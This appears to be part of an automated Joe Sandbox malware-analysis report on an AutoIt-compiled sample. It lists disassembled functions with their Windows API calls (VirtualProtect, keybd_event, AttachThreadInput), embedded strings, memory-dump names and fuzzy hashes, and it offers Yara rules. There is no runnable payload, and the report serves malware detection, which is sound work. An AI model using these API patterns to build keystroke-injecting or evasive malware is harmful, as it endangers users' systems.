Opcode Fuzzy Hash: e2e14ad2f8aad88fc96cbae81407ac55e9a1040f81b8cceecdceccfd6d61a591
Instruction Fuzzy Hash: 2351A631A2120D96EF14EFB0C954BEFB379EF58300F108568A609F7290E7799B44CB65

Function 00760C08 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00760CB7

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 6c54ffbec366df1b9232337199d70f97790b24acf682bb23392cf245c632e602
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 1631E274A001059FC718DF58C484AAAFBA6FF59300B6487A5E80ACB351EB35EDD1DBE0

Function 0077FCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0077FCB7

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 8f2407565e204cad50d9e67c9bd732c9f1d619b05fe4b6834e581b61d26e912f
Instruction ID: 27ed6b3ced7f6a2bedd25997ce008c02a992a92a5b385419c328978495053c9d
Opcode Fuzzy Hash: 8f2407565e204cad50d9e67c9bd732c9f1d619b05fe4b6834e581b61d26e912f
Instruction Fuzzy Hash: C141E474604351DFDB24DF24C498B1ABBE1BF45314F0988ACE8998B362C73AE845CB92

Function 00747B53 Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00747BB3

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 249a4f3e5d47e5137d95fb60310bc944594295abcf5af3b45e48c29aaafcea93
Instruction ID: 1d7b5888b5b3be5f4d0e7f74ec914b66005fdc4c2f0a6da92adc96941fe934cb
Opcode Fuzzy Hash: 249a4f3e5d47e5137d95fb60310bc944594295abcf5af3b45e48c29aaafcea93
Instruction Fuzzy Hash: BE213AB2604A09EBDF188F25EC4177A7BB4FF18390F21C56DE98AC5191EB3881D0D755

Function 00744DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00744BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00744BEF

Part of subcall function 0076525B: __wfsopen.LIBCMT ref: 00765266

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,008052F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00744E0F

Part of subcall function 00744B6A: FreeLibrary.KERNEL32(00000000), ref: 00744BA4

Part of subcall function 00744C70: _memmove.LIBCMT ref: 00744CBA

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: 1938284a848eb2aed86091489debb3e0b97786749d1f3af50afca7891a388fe4
Instruction ID: 732067da54898ce105cb7812304b8b17b5ae130166e05a0b642817a53d9d3dd0
Opcode Fuzzy Hash: 1938284a848eb2aed86091489debb3e0b97786749d1f3af50afca7891a388fe4
Instruction Fuzzy Hash: 2811E331640205EBCF20AF70CC1AFAD77A9AF44750F10882DF542A7181EB799E11BB51

Function 0077FD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 0077FD91

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 35e21a30eb486b5a326dd99f236f2c3742c70d7b021aa29288524ca4cd6ea490
Instruction ID: df4a947addc83e449de36c7ebe2870263752c3499549ee99e2453bd03a13b7fc
Opcode Fuzzy Hash: 35e21a30eb486b5a326dd99f236f2c3742c70d7b021aa29288524ca4cd6ea490
Instruction Fuzzy Hash: 732113B4A48341DFCB14DF24C444A1BBBE1BF88314F05896CE98A57762D739E809CB92

Function 0076072A Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 905b097b7ddefcc44e523a6ff87020cc32814fea4c0dc1331af00efdd4b3b6f3
Instruction ID: 73d9348539cf26aaa9104d43614f838e50913b9e8f81fd3c02555fcc5f02bad1
Opcode Fuzzy Hash: 905b097b7ddefcc44e523a6ff87020cc32814fea4c0dc1331af00efdd4b3b6f3
Instruction Fuzzy Hash: 4401D2726001209EDF225A24F842AFFB3A9EF90331B18856EEC1AD6900D6697C459AD1

Function 00764863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 007648A6

Part of subcall function 00768B28: __getptd_noexit.LIBCMT ref: 00768B28

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: 6ed6807b31ae66a4e7c5835b3ebf0cca001569a02064a20f3fb368dc8e6944df
Instruction ID: 340972afdce7cf1f8c9b5d50d62e3ed062f01b312290e8380fd7751f9c1378e1
Opcode Fuzzy Hash: 6ed6807b31ae66a4e7c5835b3ebf0cca001569a02064a20f3fb368dc8e6944df
Instruction Fuzzy Hash: AAF0C27190074AEBDF51AFB88C0A7AE36A1AF00325F158514FC269B191CB7C9D51DF52

Function 00744E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,008052F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00744E7E

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: c2d014dc4320fe6481352ca2352dac7f14db93ba8ed0b65d01ee31cb65c6b5b3
Instruction ID: 55a285bbcc0c8606212a5df73a57e6b300d30b78bc1c712a860a5d428b2200f2
Opcode Fuzzy Hash: c2d014dc4320fe6481352ca2352dac7f14db93ba8ed0b65d01ee31cb65c6b5b3
Instruction Fuzzy Hash: 1AF06D71501721DFCB349F64E494912BBF1BF143293248A3EE1D782620C73A9840FF40

Function 00760791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 007607B0

Part of subcall function 00747BCC: _memmove.LIBCMT ref: 00747C06

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: d834b3810a8554175175816ff0323ffeca258db7a8efc7bd214bff61d2403352
Instruction ID: e9f23abb0f569ac1120ff50ddd2c79bae746dce4ce9a9f014c935840c05416c4
Opcode Fuzzy Hash: d834b3810a8554175175816ff0323ffeca258db7a8efc7bd214bff61d2403352
Instruction Fuzzy Hash: 04E0CD769041285BC721D65C9C09FEA77DDDF887A0F0441B5FD0CD7204DA64AC80C7D0

Function 007A8E9F Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 007A8EC1

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
Instruction ID: ff4408195ce187792ed1e35c17703b578f1c65d0c010902bc43b19a8ac7c2f82
Opcode Fuzzy Hash: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
Instruction Fuzzy Hash: FFE092B0508B009BD7388A24D804BA373E1AB06304F04091DF6AB83242EB6678418759

Function 012FBD70 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?), ref: 012FBD7B

Memory Dump Source

Source File: 00000000.00000002.1396408167.00000000012FB000.00000040.00000020.00020000.00000000.sdmp, Offset: 012FB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12fb000_28uMwHvbTD.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
Instruction ID: e338af9ecb72b41cd2c6a1a8e6786ab80908956aacd99ffd4d655f28b4b86350
Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
Instruction Fuzzy Hash: 4DE08C31A35208EBDB24CAA8C815AA9B3B8D709320F004B6CEB06C32C0D5318A409617

Function 012FBD40 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?), ref: 012FBD4B

Memory Dump Source

Source File: 00000000.00000002.1396408167.00000000012FB000.00000040.00000020.00020000.00000000.sdmp, Offset: 012FB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12fb000_28uMwHvbTD.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
Instruction ID: 1c6687161e83434802ec2146368322074981b1edbf11cf3d60bb7111bf1abb56
Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
Instruction Fuzzy Hash: F5D0A73091620CEBCB20CFB8DC049DAB3A8D704320F004769FE15C32C0D53199409752

Function 0076525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 00765266

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: d407c916b5011cfa2b9967a7411a1e493fc1c5b2021e9368041e8fdedb4b86bf
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: 07B092B644020CBBCE012A82EC02A493B19AB41764F408020FF0C18162A677A664AA89

Function 012FD75C Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 012FD771

Memory Dump Source

Source File: 00000000.00000002.1396408167.00000000012FB000.00000040.00000020.00020000.00000000.sdmp, Offset: 012FB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12fb000_28uMwHvbTD.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction ID: 0c1dd206d4cab15ac63686ce73e44b2669700ff0f0b3f1a459874f0bd606f256
Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction Fuzzy Hash: 7EE0BF7498010DEFDB00EFE4D5496EE7BB4EF04301F1006A5FD05D7681DB309E548A62

Function 012FD760 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 012FD771

Memory Dump Source

Source File: 00000000.00000002.1396408167.00000000012FB000.00000040.00000020.00020000.00000000.sdmp, Offset: 012FB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12fb000_28uMwHvbTD.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: ab919054d43a207fa838af44c89a0e6bf50a8421aa20c512916a282cbb788207
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 5BE0E67498010DDFDB00EFF4D5496AE7FB4EF04301F100265FD01D2281D6309D508A62

Non-executed Functions

Function 007CCABC Relevance: 70.6, APIs: 37, Strings: 3, Instructions: 632windowkeyboardnativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00742612: GetWindowLongW.USER32(?,000000EB), ref: 00742623

NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?,?,?), ref: 007CCB37
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 007CCB95
GetWindowLongW.USER32(?,000000F0), ref: 007CCBD6
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007CCC00
SendMessageW.USER32 ref: 007CCC29
_wcsncpy.LIBCMT ref: 007CCC95
GetKeyState.USER32(00000011), ref: 007CCCB6
GetKeyState.USER32(00000009), ref: 007CCCC3
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 007CCCD9
GetKeyState.USER32(00000010), ref: 007CCCE3
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007CCD0C
SendMessageW.USER32 ref: 007CCD33
SendMessageW.USER32(?,00001030,?,007CB348), ref: 007CCE37
SetCapture.USER32(?), ref: 007CCE69
ClientToScreen.USER32(?,?), ref: 007CCECE
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007CCEF5
ReleaseCapture.USER32 ref: 007CCF00
GetCursorPos.USER32(?), ref: 007CCF3A
ScreenToClient.USER32(?,?), ref: 007CCF47
SendMessageW.USER32(?,00001012,00000000,?), ref: 007CCFA3
SendMessageW.USER32 ref: 007CCFD1
SendMessageW.USER32(?,00001111,00000000,?), ref: 007CD00E
SendMessageW.USER32 ref: 007CD03D
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 007CD05E
SendMessageW.USER32(?,0000110B,00000009,?), ref: 007CD06D
GetCursorPos.USER32(?), ref: 007CD08D
ScreenToClient.USER32(?,?), ref: 007CD09A
GetParent.USER32(?), ref: 007CD0BA
SendMessageW.USER32(?,00001012,00000000,?), ref: 007CD123
SendMessageW.USER32 ref: 007CD154
ClientToScreen.USER32(?,?), ref: 007CD1B2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 007CD1E2
SendMessageW.USER32(?,00001111,00000000,?), ref: 007CD20C
SendMessageW.USER32 ref: 007CD22F
ClientToScreen.USER32(?,?), ref: 007CD281
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 007CD2B5

Part of subcall function 007425DB: GetWindowLongW.USER32(?,000000EB), ref: 007425EC

GetWindowLongW.USER32(?,000000F0), ref: 007CD351

Strings

F, xrefs: 007CD235
@U=u, xrefs: 007CCB95, 007CCC00, 007CCC29, 007CCCD9, 007CCD0C, 007CCD33, 007CCE37, 007CCFA3, 007CCFD1, 007CD00E, 007CD03D, 007CD123, 007CD154, 007CD20C, 007CD22F
@GUI_DRAGID, xrefs: 007CCE9C

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: MessageSend$ClientScreen$LongWindow$State$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease_wcsncpy
String ID: @GUI_DRAGID$@U=u$F
API String ID: 302779176-1007936534
Opcode ID: 7375f68816b37faac96940a2531be1ce3873052e09fda68709c487e6efadbee1
Instruction ID: 5d35dd17b6a6aac575e2945312b368e3bea099e60f80faf75cfcf879c606f8af
Opcode Fuzzy Hash: 7375f68816b37faac96940a2531be1ce3873052e09fda68709c487e6efadbee1
Instruction Fuzzy Hash: 3D427774204280AFDB22CF68C889FAABBE5FF49310F14452DF699972A1C739DC54DB52

Function 00756F9E Relevance: 52.3, APIs: 19, Strings: 8, Instructions: 5018COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 007571C3
_memset.LIBCMT ref: 00757539
_memmove.LIBCMT ref: 007576AC

Strings

[:<:]], xrefs: 00757479
[:>:]], xrefs: 00757492
_u, xrefs: 007923CB
3cu, xrefs: 007923A0
\b(?<=\w), xrefs: 00793773
\b(?=\w), xrefs: 00793769
Q\E, xrefs: 00757FCB
DEFINE, xrefs: 00792103

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: _memmove$_memset
String ID: 3cu$DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_u
API String ID: 1357608183-571145016
Opcode ID: 27dc05bf59b5c9ebe01d045393d5ee21a6f49bb002f73606e8bf0c7be19e02db
Instruction ID: 09d6576d9fb8b7a25c60d1a9c8cf117ab86b9588e22312a525cf543c06cdb28f
Opcode Fuzzy Hash: 27dc05bf59b5c9ebe01d045393d5ee21a6f49bb002f73606e8bf0c7be19e02db
Instruction Fuzzy Hash: 4A93A375A00219DBDF24CF58E881BEDB7B1FF48310F25816AE945AB391E7789D82CB50

Function 007448D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?), ref: 007448DF
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0077D665
IsIconic.USER32(?), ref: 0077D66E
ShowWindow.USER32(?,00000009), ref: 0077D67B
SetForegroundWindow.USER32(?), ref: 0077D685
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0077D69B
GetCurrentThreadId.KERNEL32 ref: 0077D6A2
GetWindowThreadProcessId.USER32(?,00000000), ref: 0077D6AE
AttachThreadInput.USER32(?,00000000,00000001), ref: 0077D6BF
AttachThreadInput.USER32(?,00000000,00000001), ref: 0077D6C7
AttachThreadInput.USER32(00000000,?,00000001), ref: 0077D6CF
SetForegroundWindow.USER32(?), ref: 0077D6D2
MapVirtualKeyW.USER32(00000012,00000000), ref: 0077D6E7
keybd_event.USER32(00000012,00000000), ref: 0077D6F2
MapVirtualKeyW.USER32(00000012,00000000), ref: 0077D6FC
keybd_event.USER32(00000012,00000000), ref: 0077D701
MapVirtualKeyW.USER32(00000012,00000000), ref: 0077D70A
keybd_event.USER32(00000012,00000000), ref: 0077D70F
MapVirtualKeyW.USER32(00000012,00000000), ref: 0077D719
